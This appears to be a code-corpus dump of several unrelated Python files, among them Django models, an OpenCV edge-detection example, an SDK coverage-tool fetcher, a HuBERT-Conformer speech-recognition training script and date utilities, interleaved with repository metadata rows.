question = models.ForeignKey(Question, on_delete=models.CASCADE)
seq = models.PositiveSmallIntegerField(default=0)
class Meta:
unique_together = (('questionnaire', 'question'),)
class QuestionChoice(models.Model):
question = models.ForeignKey(Question, on_delete=models.CASCADE, related_name='choices')
item = models.CharField(max_length=100)
def __str__(self):
return f'{self.question.title} | {self.item}'
class QuestionChoiceSequence(models.Model):
question = models.ForeignKey(Question, on_delete=models.CASCADE)
questionchoice = models.ForeignKey(QuestionChoice, on_delete=models.CASCADE)
seq = models.PositiveSmallIntegerField(default=0)
class Meta:
unique_together = (('question', 'questionchoice'),)
class QuestionResponseMaster(models.Model):
questionnaire = models.ForeignKey(Questionnaire, on_delete=models.CASCADE)
class QuestionResponseDetail(models.Model):
response_master_id = models.ForeignKey(QuestionResponseMaster, on_delete=models.CASCADE)
question = models.ForeignKey(Question, on_delete=models.CASCADE)
class QuestionResponseSelection(models.Model):
response_detail_id = models.ForeignKey(QuestionResponseDetail, on_delete=models.CASCADE)
choice = models.ForeignKey(QuestionChoice, on_delete=models.CASCADE)
class QuestionResponseText(models.Model):
response_detail_id = models.ForeignKey(QuestionResponseDetail, on_delete=models.CASCADE)
text = models.TextField()
| true | true |
f7193789b5657ecbc5688792c3078421cbb68e5f | 1,193 | py | Python | meiduo_mall/meiduo_mall/apps/contents/models.py | 0-pangda/meiduo_project1 | 69d771d9c5b67c01510ecfabe4c28989e44d0fba | [
"MIT"
] | null | null | null | meiduo_mall/meiduo_mall/apps/contents/models.py | 0-pangda/meiduo_project1 | 69d771d9c5b67c01510ecfabe4c28989e44d0fba | [
"MIT"
] | null | null | null | meiduo_mall/meiduo_mall/apps/contents/models.py | 0-pangda/meiduo_project1 | 69d771d9c5b67c01510ecfabe4c28989e44d0fba | [
"MIT"
] | null | null | null | from django.db import models
from meiduo_mall.utils.models import BaseModel
# Create your models here.
class ContentCategory(BaseModel):
"""广告内容类别"""
name = models.CharField(max_length=50, verbose_name='名称')
key = models.CharField(max_length=50, verbose_name='类别键名')
class Meta:
db_table = 'tb_content_category'
verbose_name = '广告内容类别'
verbose_name_plural = verbose_name
def __str__(self):
return self.name
class Content(BaseModel):
"""广告内容"""
category = models.ForeignKey(ContentCategory, on_delete=models.PROTECT, verbose_name='类别')
title = models.CharField(max_length=100, verbose_name='标题')
url = models.CharField(max_length=300, verbose_name='内容链接')
image = models.ImageField(null=True, blank=True, verbose_name='图片')
text = models.TextField(null=True, blank=True, verbose_name='内容')
sequence = models.IntegerField(verbose_name='排序')
status = models.BooleanField(default=True, verbose_name='是否展示')
class Meta:
db_table = 'tb_content'
verbose_name = '广告内容'
verbose_name_plural = verbose_name
def __str__(self):
return self.category.name + ': ' + self.title | 32.243243 | 94 | 0.695725 | from django.db import models
from meiduo_mall.utils.models import BaseModel
class ContentCategory(BaseModel):
name = models.CharField(max_length=50, verbose_name='名称')
key = models.CharField(max_length=50, verbose_name='类别键名')
class Meta:
db_table = 'tb_content_category'
verbose_name = '广告内容类别'
verbose_name_plural = verbose_name
def __str__(self):
return self.name
class Content(BaseModel):
category = models.ForeignKey(ContentCategory, on_delete=models.PROTECT, verbose_name='类别')
title = models.CharField(max_length=100, verbose_name='标题')
url = models.CharField(max_length=300, verbose_name='内容链接')
image = models.ImageField(null=True, blank=True, verbose_name='图片')
text = models.TextField(null=True, blank=True, verbose_name='内容')
sequence = models.IntegerField(verbose_name='排序')
status = models.BooleanField(default=True, verbose_name='是否展示')
class Meta:
db_table = 'tb_content'
verbose_name = '广告内容'
verbose_name_plural = verbose_name
def __str__(self):
return self.category.name + ': ' + self.title | true | true |
f719378c3733c997ba58b7324d53b78e85a768f4 | 301 | py | Python | opencv-python/ex6_image_canny.py | jemygraw/opencv-tutorial | 2b85b5bf4b1e6ba416733a5b903752462101725e | [
"MIT"
] | null | null | null | opencv-python/ex6_image_canny.py | jemygraw/opencv-tutorial | 2b85b5bf4b1e6ba416733a5b903752462101725e | [
"MIT"
] | null | null | null | opencv-python/ex6_image_canny.py | jemygraw/opencv-tutorial | 2b85b5bf4b1e6ba416733a5b903752462101725e | [
"MIT"
] | 2 | 2019-06-03T16:07:03.000Z | 2019-07-24T08:36:00.000Z | import cv2
fname = '/Users/jemy/Documents/github-avatar.png'
img = cv2.imread(fname, cv2.CAP_MODE_GRAY)
cv2.namedWindow('Example6', cv2.WINDOW_AUTOSIZE)
cv2.imshow('Example6', img)
# canny
imgOut = cv2.Canny(img, 0, 100)
cv2.imshow('Example6', imgOut)
cv2.waitKey(0)
cv2.destroyWindow('Example6')
| 20.066667 | 49 | 0.744186 | import cv2
fname = '/Users/jemy/Documents/github-avatar.png'
img = cv2.imread(fname, cv2.CAP_MODE_GRAY)
cv2.namedWindow('Example6', cv2.WINDOW_AUTOSIZE)
cv2.imshow('Example6', img)
imgOut = cv2.Canny(img, 0, 100)
cv2.imshow('Example6', imgOut)
cv2.waitKey(0)
cv2.destroyWindow('Example6')
| true | true |
f71939e1d16adffd88e34ce88da8f38f90363eca | 2,079 | py | Python | scripts/sdk_fetch_coverage_tools.py | PelionIoT/mbed-cloud-sdk-java | cc99c51db43cc9ae36601f20f20b7d8cd7515432 | [
"Apache-2.0"
] | 7 | 2017-12-28T11:19:15.000Z | 2020-03-23T19:15:31.000Z | scripts/sdk_fetch_coverage_tools.py | PelionIoT/mbed-cloud-sdk-java | cc99c51db43cc9ae36601f20f20b7d8cd7515432 | [
"Apache-2.0"
] | 99 | 2018-01-09T23:56:13.000Z | 2020-11-03T05:20:55.000Z | scripts/sdk_fetch_coverage_tools.py | PelionIoT/mbed-cloud-sdk-java | cc99c51db43cc9ae36601f20f20b7d8cd7515432 | [
"Apache-2.0"
] | 5 | 2018-08-02T06:29:18.000Z | 2019-10-23T11:43:59.000Z | #!/usr/bin/python
import os
import sdk_common
# Block in charge of fetching code coverage tools
class SDKCoverageToolsFetcher(sdk_common.BuildStepUsingGradle):
def __init__(self, logger=None):
super(SDKCoverageToolsFetcher, self).__init__('SDK Coverage tools fetch', logger)
self.is_code_coverage = self.common_config.get_config().should_perform_code_coverage()
self.artifacts_parser = self.common_config.get_config().get_new_artifact_log_parser(self)
self.jacoco_cli_name = 'jacococli.jar'
def retrieve_folder_location(self, key):
if not key:
return None
self.artifacts_parser.load()
return self.clean_path(
self.artifacts_parser.get_property(key),
False)
def check_whether_coverage_result_folder_has_been_created(self):
code_coverage_result_dir = self.retrieve_folder_location('SDK_COVERAGE_RESULTS_DIR')
return False if not code_coverage_result_dir else os.path.exists(code_coverage_result_dir)
def check_whether_tools_have_been_copied(self):
code_coverage_tools_dir = self.retrieve_folder_location('SDK_COVERAGE_TOOLS_DIR')
return False if not code_coverage_tools_dir else (
os.path.exists(code_coverage_tools_dir) and len(
os.listdir(code_coverage_tools_dir)) >= 2) # TODO change if fewer tools are used
def has_already_been_run(self):
return self.check_whether_coverage_result_folder_has_been_created() and self.check_whether_tools_have_been_copied()
def execute(self):
self.print_title()
try:
if self.is_code_coverage:
self.log_info("Retrieving code coverage tools")
if not self.has_already_been_run():
self.execute_gradle_task("copyCoverageAgent")
else:
self.log_info("Tools are already present.")
except:
self.log_error('Failed to retrieving code coverage tools')
return False
self.log_info("Done.")
return True
| 40.764706 | 123 | 0.696489 |
import os
import sdk_common
class SDKCoverageToolsFetcher(sdk_common.BuildStepUsingGradle):
def __init__(self, logger=None):
super(SDKCoverageToolsFetcher, self).__init__('SDK Coverage tools fetch', logger)
self.is_code_coverage = self.common_config.get_config().should_perform_code_coverage()
self.artifacts_parser = self.common_config.get_config().get_new_artifact_log_parser(self)
self.jacoco_cli_name = 'jacococli.jar'
def retrieve_folder_location(self, key):
if not key:
return None
self.artifacts_parser.load()
return self.clean_path(
self.artifacts_parser.get_property(key),
False)
def check_whether_coverage_result_folder_has_been_created(self):
code_coverage_result_dir = self.retrieve_folder_location('SDK_COVERAGE_RESULTS_DIR')
return False if not code_coverage_result_dir else os.path.exists(code_coverage_result_dir)
def check_whether_tools_have_been_copied(self):
code_coverage_tools_dir = self.retrieve_folder_location('SDK_COVERAGE_TOOLS_DIR')
return False if not code_coverage_tools_dir else (
os.path.exists(code_coverage_tools_dir) and len(
os.listdir(code_coverage_tools_dir)) >= 2)
def has_already_been_run(self):
return self.check_whether_coverage_result_folder_has_been_created() and self.check_whether_tools_have_been_copied()
def execute(self):
self.print_title()
try:
if self.is_code_coverage:
self.log_info("Retrieving code coverage tools")
if not self.has_already_been_run():
self.execute_gradle_task("copyCoverageAgent")
else:
self.log_info("Tools are already present.")
except:
self.log_error('Failed to retrieving code coverage tools')
return False
self.log_info("Done.")
return True
| true | true |
f7193a1de09a2338512e1f71556799b0418fb19a | 683 | py | Python | app/core/migrations/0002_tag.py | bwanarm/recipe-app-api | 1204280495547ceb93a59cd2ec2b1c2a82ef187d | [
"MIT"
] | null | null | null | app/core/migrations/0002_tag.py | bwanarm/recipe-app-api | 1204280495547ceb93a59cd2ec2b1c2a82ef187d | [
"MIT"
] | null | null | null | app/core/migrations/0002_tag.py | bwanarm/recipe-app-api | 1204280495547ceb93a59cd2ec2b1c2a82ef187d | [
"MIT"
] | null | null | null | # Generated by Django 2.1.15 on 2020-07-31 13:10
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('core', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Tag',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=255)),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
]
| 28.458333 | 118 | 0.616398 |
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('core', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Tag',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=255)),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
]
| true | true |
f7193a2229b00e7439ffb31eaf7bc0964fc3bb54 | 10,877 | py | Python | pretrained-model/stt/hubert/conformer-tiny-ctc.py | ishine/malaya-speech | fd34afc7107af1656dff4b3201fa51dda54fde18 | [
"MIT"
] | null | null | null | pretrained-model/stt/hubert/conformer-tiny-ctc.py | ishine/malaya-speech | fd34afc7107af1656dff4b3201fa51dda54fde18 | [
"MIT"
] | null | null | null | pretrained-model/stt/hubert/conformer-tiny-ctc.py | ishine/malaya-speech | fd34afc7107af1656dff4b3201fa51dda54fde18 | [
"MIT"
] | null | null | null | import os
os.environ['CUDA_VISIBLE_DEVICES'] = '3'
import pyroomacoustics as pra
import numpy as np
from pydub import AudioSegment
from sklearn.utils import shuffle
from glob import glob
import random
import json
from malaya_speech.train.model.conformer.model import Model as ConformerModel
from malaya_speech.train.model import hubert, ctc
import malaya_speech.train as train
import malaya_speech.config
import malaya_speech.augmentation.waveform as augmentation
import malaya_speech
import tensorflow as tf
import os
import string
sr = 16000
maxlen = 18
minlen_text = 1
prob_aug = 0.95
unique_vocab = [''] + list(string.ascii_lowercase + string.digits) + [' ']
def augment_room(y, scale=1.0):
corners = np.array(
[[0, 0], [0, 5 * scale], [3 * scale, 5 * scale], [3 * scale, 0]]
).T
room = pra.Room.from_corners(
corners,
fs=sr,
materials=pra.Material(0.2, 0.15),
ray_tracing=True,
air_absorption=True,
)
room.extrude(3.5, materials=pra.Material(0.2, 0.15))
room.set_ray_tracing(
receiver_radius=0.5, n_rays=1000, energy_thres=1e-5
)
room.add_source([1.5 * scale, 4 * scale, 0.5], signal=y)
R = np.array([[1.5 * scale], [0.5 * scale], [0.5]])
room.add_microphone(R)
room.simulate()
return room.mic_array.signals[0]
def random_amplitude_threshold(sample, low=1, high=2, threshold=0.4):
y_aug = sample.copy()
dyn_change = np.random.uniform(low=low, high=high)
y_aug[np.abs(y_aug) >= threshold] = (
y_aug[np.abs(y_aug) >= threshold] * dyn_change
)
return np.clip(y_aug, -1, 1)
def add_uniform_noise(
sample, power=0.01, return_noise=False, scale=False
):
y_noise = sample.copy()
noise_amp = power * np.random.uniform() * np.amax(y_noise)
noise = noise_amp * np.random.normal(size=y_noise.shape[0])
y_noise = y_noise + noise
if scale:
y_noise = y_noise / (np.max(np.abs(y_noise)) + 1e-9)
if return_noise:
if scale:
noise = noise / (np.max(np.abs(y_noise)) + 1e-9)
return y_noise, noise
else:
return y_noise
def calc(signal, add_uniform=True):
choice = random.randint(0, 10)
print('choice', choice)
if choice == 0:
x = augmentation.sox_augment_high(
signal,
min_bass_gain=random.randint(25, 50),
reverberance=random.randint(0, 80),
hf_damping=10,
room_scale=random.randint(0, 50),
negate=1,
)
if choice == 1:
x = augmentation.sox_augment_high(
signal,
min_bass_gain=random.randint(25, 70),
reverberance=random.randint(0, 80),
hf_damping=10,
room_scale=random.randint(0, 50),
negate=0,
)
if choice == 2:
x = augmentation.sox_augment_low(
signal,
min_bass_gain=random.randint(5, 30),
reverberance=random.randint(0, 80),
hf_damping=10,
room_scale=random.randint(0, 50),
negate=random.randint(0, 1),
)
if choice == 3:
x = augmentation.sox_augment_combine(
signal,
min_bass_gain_high=random.randint(25, 70),
min_bass_gain_low=random.randint(5, 30),
reverberance=random.randint(0, 80),
hf_damping=10,
room_scale=random.randint(0, 90),
)
if choice == 4:
x = augmentation.sox_reverb(
signal,
reverberance=random.randint(10, 80),
hf_damping=10,
room_scale=random.randint(10, 90),
)
if choice == 5:
x = random_amplitude_threshold(
signal, threshold=random.uniform(0.35, 0.8)
)
if choice == 6:
x = augmentation.lowpass_filter(
signal, sr=sr, cutoff=random.randint(200, 551)
)
if choice == 7:
x = augmentation.highpass_filter(
signal, sr=sr, cutoff=random.randint(551, 1653)
)
if choice == 8:
x = augmentation.bandpass_filter(
signal,
sr=sr,
cutoff_low=random.randint(200, 551),
cutoff_high=random.randint(551, 1653),
)
if choice == 9:
x = augment_room(signal)
if choice == 10:
x = signal
if choice not in [5] and random.gauss(0.5, 0.14) > 0.6:
x = random_amplitude_threshold(
x, low=1.0, high=2.0, threshold=random.uniform(0.6, 0.9)
)
if random.gauss(0.5, 0.14) > 0.6 and add_uniform:
x = add_uniform_noise(x, power=random.uniform(0.005, 0.015))
return x
def mp3_to_wav(file, sr=sr):
audio = AudioSegment.from_file(file)
audio = audio.set_frame_rate(sr).set_channels(1)
sample = np.array(audio.get_array_of_samples())
return malaya_speech.astype.int_to_float(sample), sr
def generate(file):
with open(file) as fopen:
dataset = json.load(fopen)
audios, cleaned_texts = dataset['X'], dataset['Y']
while True:
audios, cleaned_texts = shuffle(audios, cleaned_texts)
for i in range(len(audios)):
try:
if audios[i].endswith('.mp3'):
# print('found mp3', audios[i])
wav_data, _ = mp3_to_wav(audios[i])
else:
wav_data, _ = malaya_speech.load(audios[i], sr=sr)
if len(cleaned_texts[i]) < minlen_text:
# print(f'skipped text too short {audios[i]}')
continue
if (len(wav_data) / sr) > maxlen:
continue
t = [unique_vocab.index(c) for c in cleaned_texts[i]]
yield {
'waveforms': wav_data,
'waveforms_length': [len(wav_data)],
'targets': t,
'targets_length': [len(t)],
}
except Exception as e:
print(e)
def get_dataset(
file,
batch_size=12,
shuffle_size=20,
thread_count=24,
maxlen_feature=1800,
):
def get():
dataset = tf.data.Dataset.from_generator(
generate,
{
'waveforms': tf.float32,
'waveforms_length': tf.int32,
'targets': tf.int32,
'targets_length': tf.int32,
},
output_shapes={
'waveforms': tf.TensorShape([None]),
'waveforms_length': tf.TensorShape([None]),
'targets': tf.TensorShape([None]),
'targets_length': tf.TensorShape([None]),
},
args=(file,),
)
dataset = dataset.prefetch(tf.contrib.data.AUTOTUNE)
dataset = dataset.padded_batch(
batch_size,
padded_shapes={
'waveforms': tf.TensorShape([None]),
'waveforms_length': tf.TensorShape([None]),
'targets': tf.TensorShape([None]),
'targets_length': tf.TensorShape([None]),
},
padding_values={
'waveforms': tf.constant(0, dtype=tf.float32),
'waveforms_length': tf.constant(0, dtype=tf.int32),
'targets': tf.constant(0, dtype=tf.int32),
'targets_length': tf.constant(0, dtype=tf.int32),
},
)
return dataset
return get
class Encoder:
def __init__(self, config):
self.config = config
self.encoder = ConformerModel(**self.config)
def __call__(self, x, input_mask, training=True):
return self.encoder(x, training=training)
total_steps = 2000000
def model_fn(features, labels, mode, params):
config_conformer = malaya_speech.config.conformer_tiny_encoder_config
config_conformer['subsampling']['type'] = 'none'
config_conformer['dropout'] = 0.0
encoder = Encoder(config_conformer)
cfg = hubert.HuBERTConfig(
extractor_mode='layer_norm',
dropout=0.0,
attention_dropout=0.0,
encoder_layerdrop=0.0,
dropout_input=0.0,
dropout_features=0.0,
final_dim=128,
)
model = hubert.Model(cfg, encoder, ['pad', 'eos', 'unk'] + [str(i) for i in range(100)])
X = features['waveforms']
X_len = features['waveforms_length'][:, 0]
targets = features['targets']
targets_int32 = tf.cast(targets, tf.int32)
targets_length = features['targets_length'][:, 0]
r = model(X, padding_mask=X_len, features_only=True, mask=False)
logits = tf.layers.dense(r['x'], len(unique_vocab) + 1)
seq_lens = tf.reduce_sum(
tf.cast(tf.logical_not(r['padding_mask']), tf.int32), axis=1
)
mean_error, sum_error, sum_weight = ctc.loss.ctc_loss(
logits, seq_lens, targets_int32, targets_length
)
loss = mean_error
accuracy = ctc.metrics.ctc_sequence_accuracy(
logits, seq_lens, targets_int32, targets_length,
)
tf.identity(loss, 'train_loss')
tf.identity(accuracy, name='train_accuracy')
tf.summary.scalar('train_accuracy', accuracy)
variables = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES)
init_checkpoint = 'hubert-conformer-tiny/model.ckpt-1000000'
assignment_map, initialized_variable_names = train.get_assignment_map_from_checkpoint(
variables, init_checkpoint
)
tf.train.init_from_checkpoint(init_checkpoint, assignment_map)
if mode == tf.estimator.ModeKeys.TRAIN:
train_op = train.optimizer.adamw.create_optimizer(
loss,
init_lr=5e-5,
num_train_steps=total_steps,
num_warmup_steps=100000,
end_learning_rate=0.0,
weight_decay_rate=0.01,
beta_1=0.9,
beta_2=0.999,
epsilon=1e-6,
clip_norm=1.0,
)
estimator_spec = tf.estimator.EstimatorSpec(
mode=mode, loss=loss, train_op=train_op
)
elif mode == tf.estimator.ModeKeys.EVAL:
estimator_spec = tf.estimator.EstimatorSpec(
mode=tf.estimator.ModeKeys.EVAL,
loss=loss,
eval_metric_ops={
'accuracy': ctc.metrics.ctc_sequence_accuracy_estimator(
logits, seq_lens, targets_int32, targets_length
)
},
)
return estimator_spec
train_hooks = [
tf.train.LoggingTensorHook(
['train_accuracy', 'train_loss'], every_n_iter=1
)
]
train_dataset = get_dataset('bahasa-asr-train-combined.json')
dev_dataset = get_dataset('bahasa-asr-test.json')
train.run_training(
train_fn=train_dataset,
model_fn=model_fn,
model_dir='hubert-conformer-tiny-ctc-char',
num_gpus=1,
log_step=1,
save_checkpoint_step=20000,
max_steps=total_steps,
eval_fn=dev_dataset,
train_hooks=train_hooks,
)
| 30.639437 | 92 | 0.590144 | import os
os.environ['CUDA_VISIBLE_DEVICES'] = '3'
import pyroomacoustics as pra
import numpy as np
from pydub import AudioSegment
from sklearn.utils import shuffle
from glob import glob
import random
import json
from malaya_speech.train.model.conformer.model import Model as ConformerModel
from malaya_speech.train.model import hubert, ctc
import malaya_speech.train as train
import malaya_speech.config
import malaya_speech.augmentation.waveform as augmentation
import malaya_speech
import tensorflow as tf
import os
import string
sr = 16000
maxlen = 18
minlen_text = 1
prob_aug = 0.95
unique_vocab = [''] + list(string.ascii_lowercase + string.digits) + [' ']
def augment_room(y, scale=1.0):
corners = np.array(
[[0, 0], [0, 5 * scale], [3 * scale, 5 * scale], [3 * scale, 0]]
).T
room = pra.Room.from_corners(
corners,
fs=sr,
materials=pra.Material(0.2, 0.15),
ray_tracing=True,
air_absorption=True,
)
room.extrude(3.5, materials=pra.Material(0.2, 0.15))
room.set_ray_tracing(
receiver_radius=0.5, n_rays=1000, energy_thres=1e-5
)
room.add_source([1.5 * scale, 4 * scale, 0.5], signal=y)
R = np.array([[1.5 * scale], [0.5 * scale], [0.5]])
room.add_microphone(R)
room.simulate()
return room.mic_array.signals[0]
def random_amplitude_threshold(sample, low=1, high=2, threshold=0.4):
y_aug = sample.copy()
dyn_change = np.random.uniform(low=low, high=high)
y_aug[np.abs(y_aug) >= threshold] = (
y_aug[np.abs(y_aug) >= threshold] * dyn_change
)
return np.clip(y_aug, -1, 1)
def add_uniform_noise(
sample, power=0.01, return_noise=False, scale=False
):
y_noise = sample.copy()
noise_amp = power * np.random.uniform() * np.amax(y_noise)
noise = noise_amp * np.random.normal(size=y_noise.shape[0])
y_noise = y_noise + noise
if scale:
y_noise = y_noise / (np.max(np.abs(y_noise)) + 1e-9)
if return_noise:
if scale:
noise = noise / (np.max(np.abs(y_noise)) + 1e-9)
return y_noise, noise
else:
return y_noise
def calc(signal, add_uniform=True):
choice = random.randint(0, 10)
print('choice', choice)
if choice == 0:
x = augmentation.sox_augment_high(
signal,
min_bass_gain=random.randint(25, 50),
reverberance=random.randint(0, 80),
hf_damping=10,
room_scale=random.randint(0, 50),
negate=1,
)
if choice == 1:
x = augmentation.sox_augment_high(
signal,
min_bass_gain=random.randint(25, 70),
reverberance=random.randint(0, 80),
hf_damping=10,
room_scale=random.randint(0, 50),
negate=0,
)
if choice == 2:
x = augmentation.sox_augment_low(
signal,
min_bass_gain=random.randint(5, 30),
reverberance=random.randint(0, 80),
hf_damping=10,
room_scale=random.randint(0, 50),
negate=random.randint(0, 1),
)
if choice == 3:
x = augmentation.sox_augment_combine(
signal,
min_bass_gain_high=random.randint(25, 70),
min_bass_gain_low=random.randint(5, 30),
reverberance=random.randint(0, 80),
hf_damping=10,
room_scale=random.randint(0, 90),
)
if choice == 4:
x = augmentation.sox_reverb(
signal,
reverberance=random.randint(10, 80),
hf_damping=10,
room_scale=random.randint(10, 90),
)
if choice == 5:
x = random_amplitude_threshold(
signal, threshold=random.uniform(0.35, 0.8)
)
if choice == 6:
x = augmentation.lowpass_filter(
signal, sr=sr, cutoff=random.randint(200, 551)
)
if choice == 7:
x = augmentation.highpass_filter(
signal, sr=sr, cutoff=random.randint(551, 1653)
)
if choice == 8:
x = augmentation.bandpass_filter(
signal,
sr=sr,
cutoff_low=random.randint(200, 551),
cutoff_high=random.randint(551, 1653),
)
if choice == 9:
x = augment_room(signal)
if choice == 10:
x = signal
if choice not in [5] and random.gauss(0.5, 0.14) > 0.6:
x = random_amplitude_threshold(
x, low=1.0, high=2.0, threshold=random.uniform(0.6, 0.9)
)
if random.gauss(0.5, 0.14) > 0.6 and add_uniform:
x = add_uniform_noise(x, power=random.uniform(0.005, 0.015))
return x
def mp3_to_wav(file, sr=sr):
audio = AudioSegment.from_file(file)
audio = audio.set_frame_rate(sr).set_channels(1)
sample = np.array(audio.get_array_of_samples())
return malaya_speech.astype.int_to_float(sample), sr
def generate(file):
with open(file) as fopen:
dataset = json.load(fopen)
audios, cleaned_texts = dataset['X'], dataset['Y']
while True:
audios, cleaned_texts = shuffle(audios, cleaned_texts)
for i in range(len(audios)):
try:
if audios[i].endswith('.mp3'):
wav_data, _ = mp3_to_wav(audios[i])
else:
wav_data, _ = malaya_speech.load(audios[i], sr=sr)
if len(cleaned_texts[i]) < minlen_text:
continue
if (len(wav_data) / sr) > maxlen:
continue
t = [unique_vocab.index(c) for c in cleaned_texts[i]]
yield {
'waveforms': wav_data,
'waveforms_length': [len(wav_data)],
'targets': t,
'targets_length': [len(t)],
}
except Exception as e:
print(e)
def get_dataset(
file,
batch_size=12,
shuffle_size=20,
thread_count=24,
maxlen_feature=1800,
):
def get():
dataset = tf.data.Dataset.from_generator(
generate,
{
'waveforms': tf.float32,
'waveforms_length': tf.int32,
'targets': tf.int32,
'targets_length': tf.int32,
},
output_shapes={
'waveforms': tf.TensorShape([None]),
'waveforms_length': tf.TensorShape([None]),
'targets': tf.TensorShape([None]),
'targets_length': tf.TensorShape([None]),
},
args=(file,),
)
dataset = dataset.prefetch(tf.contrib.data.AUTOTUNE)
dataset = dataset.padded_batch(
batch_size,
padded_shapes={
'waveforms': tf.TensorShape([None]),
'waveforms_length': tf.TensorShape([None]),
'targets': tf.TensorShape([None]),
'targets_length': tf.TensorShape([None]),
},
padding_values={
'waveforms': tf.constant(0, dtype=tf.float32),
'waveforms_length': tf.constant(0, dtype=tf.int32),
'targets': tf.constant(0, dtype=tf.int32),
'targets_length': tf.constant(0, dtype=tf.int32),
},
)
return dataset
return get
class Encoder:
def __init__(self, config):
self.config = config
self.encoder = ConformerModel(**self.config)
def __call__(self, x, input_mask, training=True):
return self.encoder(x, training=training)
total_steps = 2000000
def model_fn(features, labels, mode, params):
config_conformer = malaya_speech.config.conformer_tiny_encoder_config
config_conformer['subsampling']['type'] = 'none'
config_conformer['dropout'] = 0.0
encoder = Encoder(config_conformer)
cfg = hubert.HuBERTConfig(
extractor_mode='layer_norm',
dropout=0.0,
attention_dropout=0.0,
encoder_layerdrop=0.0,
dropout_input=0.0,
dropout_features=0.0,
final_dim=128,
)
model = hubert.Model(cfg, encoder, ['pad', 'eos', 'unk'] + [str(i) for i in range(100)])
X = features['waveforms']
X_len = features['waveforms_length'][:, 0]
targets = features['targets']
targets_int32 = tf.cast(targets, tf.int32)
targets_length = features['targets_length'][:, 0]
r = model(X, padding_mask=X_len, features_only=True, mask=False)
logits = tf.layers.dense(r['x'], len(unique_vocab) + 1)
seq_lens = tf.reduce_sum(
tf.cast(tf.logical_not(r['padding_mask']), tf.int32), axis=1
)
mean_error, sum_error, sum_weight = ctc.loss.ctc_loss(
logits, seq_lens, targets_int32, targets_length
)
loss = mean_error
accuracy = ctc.metrics.ctc_sequence_accuracy(
logits, seq_lens, targets_int32, targets_length,
)
tf.identity(loss, 'train_loss')
tf.identity(accuracy, name='train_accuracy')
tf.summary.scalar('train_accuracy', accuracy)
variables = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES)
init_checkpoint = 'hubert-conformer-tiny/model.ckpt-1000000'
assignment_map, initialized_variable_names = train.get_assignment_map_from_checkpoint(
variables, init_checkpoint
)
tf.train.init_from_checkpoint(init_checkpoint, assignment_map)
if mode == tf.estimator.ModeKeys.TRAIN:
train_op = train.optimizer.adamw.create_optimizer(
loss,
init_lr=5e-5,
num_train_steps=total_steps,
num_warmup_steps=100000,
end_learning_rate=0.0,
weight_decay_rate=0.01,
beta_1=0.9,
beta_2=0.999,
epsilon=1e-6,
clip_norm=1.0,
)
estimator_spec = tf.estimator.EstimatorSpec(
mode=mode, loss=loss, train_op=train_op
)
elif mode == tf.estimator.ModeKeys.EVAL:
estimator_spec = tf.estimator.EstimatorSpec(
mode=tf.estimator.ModeKeys.EVAL,
loss=loss,
eval_metric_ops={
'accuracy': ctc.metrics.ctc_sequence_accuracy_estimator(
logits, seq_lens, targets_int32, targets_length
)
},
)
return estimator_spec
train_hooks = [
tf.train.LoggingTensorHook(
['train_accuracy', 'train_loss'], every_n_iter=1
)
]
train_dataset = get_dataset('bahasa-asr-train-combined.json')
dev_dataset = get_dataset('bahasa-asr-test.json')
train.run_training(
train_fn=train_dataset,
model_fn=model_fn,
model_dir='hubert-conformer-tiny-ctc-char',
num_gpus=1,
log_step=1,
save_checkpoint_step=20000,
max_steps=total_steps,
eval_fn=dev_dataset,
train_hooks=train_hooks,
)
| true | true |
f7193bb525a1bcd7a4c3765147b5f3469bdd3591 | 1,555 | py | Python | etools/apps/uptime/utils.py | Igelinmist/etools | 26ae66a2ad005a7a173253bc9822a770a3115645 | [
"BSD-3-Clause"
] | null | null | null | etools/apps/uptime/utils.py | Igelinmist/etools | 26ae66a2ad005a7a173253bc9822a770a3115645 | [
"BSD-3-Clause"
] | null | null | null | etools/apps/uptime/utils.py | Igelinmist/etools | 26ae66a2ad005a7a173253bc9822a770a3115645 | [
"BSD-3-Clause"
] | null | null | null | from datetime import timedelta, date
def req_date(local_date):
if isinstance(local_date, str):
d, m, y = local_date.split('.')
return '{0}-{1}-{2}'.format(y, m, d)
elif isinstance(local_date, date):
return local_date.strftime('%Y-%m-%d')
else:
return local_date
def req_timedelta(arg):
if isinstance(arg, timedelta):
return arg
else:
if isinstance(arg, str):
parts = arg.split(':')
try:
res = timedelta(hours=int(parts[0]), minutes=int(parts[1]))
except ValueError:
res = timedelta(0)
return res
else:
return timedelta(0)
def yesterday_local():
return (date.today() - timedelta(days=1)).strftime("%d.%m.%Y")
def stat_timedelta_for_report(time_delta, round_to_hour=True):
if time_delta:
sec = time_delta.total_seconds()
hours, remainder = divmod(sec, 3600)
if round_to_hour:
if remainder >= 1800:
hours += 1
return str(int(hours))
minutes, remainder = divmod(remainder, 60)
return "{0:,d}:{1:02}".format(int(hours), int(minutes)).replace(',',' ')
else:
return '-'
def custom_redirect(url_name, *args, **kwargs):
from django.core.urlresolvers import reverse
from django.http import HttpResponseRedirect
from django.utils.http import urlencode
url = reverse(url_name, args=args)
params = urlencode(kwargs)
return HttpResponseRedirect(url + "?%s" % params)
| 28.796296 | 80 | 0.595498 | from datetime import timedelta, date
def req_date(local_date):
if isinstance(local_date, str):
d, m, y = local_date.split('.')
return '{0}-{1}-{2}'.format(y, m, d)
elif isinstance(local_date, date):
return local_date.strftime('%Y-%m-%d')
else:
return local_date
def req_timedelta(arg):
if isinstance(arg, timedelta):
return arg
else:
if isinstance(arg, str):
parts = arg.split(':')
try:
res = timedelta(hours=int(parts[0]), minutes=int(parts[1]))
except ValueError:
res = timedelta(0)
return res
else:
return timedelta(0)
def yesterday_local():
return (date.today() - timedelta(days=1)).strftime("%d.%m.%Y")
def stat_timedelta_for_report(time_delta, round_to_hour=True):
if time_delta:
